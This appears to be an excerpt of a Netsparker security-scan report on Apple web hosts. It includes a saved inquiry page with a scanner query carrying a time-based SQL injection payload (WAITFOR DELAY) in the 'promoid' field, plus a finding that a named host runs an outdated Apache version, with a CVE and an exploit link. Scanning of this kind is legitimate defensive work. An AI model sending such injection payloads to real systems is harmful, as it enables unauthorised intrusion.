<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%3BWAITFOR%20DELAY%20%270%3A0%3A25%27%2D%2D&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL">
<table width="430" border="0">

<tr>
<td width=400><font color=red><b>No records matched your search criteria.</b></font></td>
</tr>

</table>
<BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
Apache Version Is Out Of Date

Apache Version Is Out Of Date
1 TOTAL
INFORMATION
Netsparker identified that the target web server's Apache server and it is out of date. This was disclosed through the HTTP response.

Remedy

Please upgrade your installation of Apache to the latest stable version.

Remedy References

Known Vulnerabilities in this Version

Apache APR apr_fnmatch() Denial of Service Vulnerability

Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.

External References

CVE-2011-0419

Exploit

http://www.securityfocus.com/data/vulnerabilities/exploits/47820.txt

- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Version

2.2.17

Request

GET /cgi-bin/upgrade_query/query.pl HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: wsidecar.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:34 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 5598
Keep-Alive: timeout=15, max=497
Connection: Keep-Alive
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 2013


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --><div id="container"><div id="header"> <h1>Status Inquiry</h1></div> <div id="main"><p>To check the status of your Mail or Fax upgrade, please complete the short form below. Information must be entered exactly as it was submitted on your order form.</p> <form method="post" action="http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl" onsubmit="return checkfields()"></div> <!-- eof top --> <label for="company"><strong>Select Program</strong></label> <p><SELECT NAME="promoid"> <OPTION VALUE = "Select Program" SELECTED>Select Program:</option> <OPTION VALUE = "iLife-thru10|19">iLife Up to Date</option> <OPTION VALUE = "iLife-from10|20">iLife Up to Date On or After 10/20</option> </SELECT></font></p><!--#ERR--> <hr size="1"> <div class="subcolumn1-2"> <label for="company"><strong>Company Name</strong> <span class="sosumi">(required)</span></label> <p><input name="company" type="text" size="30" maxlength="50" value="" class="required"></p> <p><strong>OR</strong></p> <label for="firstname"><strong>First Name</strong> <span class="sosumi">(required)</span></label> <p><input name="firstname" type="text" size="30" maxlength="30" value="" class="required"></p> <label for="lastname"><strong>Last Name</strong> <span class="sosumi">(required)</span></label> <p><input name="lastname" type="text" size="30" maxlength="30" value="" class="required"></p> </div> <div class="subcolumn2-2"> <label for="zip"><strong>Zip Code</strong> <span class="sosumi">(required)</span></label> <p><input name="zip" type="text" size="30" maxlength="11" value="" class="required"></p> <label for="phone"><strong>Email Address</strong></label> <p><input name="email" type="text" size="30" maxlength="50" value=""></p> </div> <div class="clearer">&nbsp;</div> <input type="submit" name="submit" value="&nbsp;&nbsp;Check Status&nbsp;&nbsp;" align="right"> <p class="sosumi">* Either company (if applicable) or customer name are required.</p> </form> <div class="clearer">&nbsp;</div></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>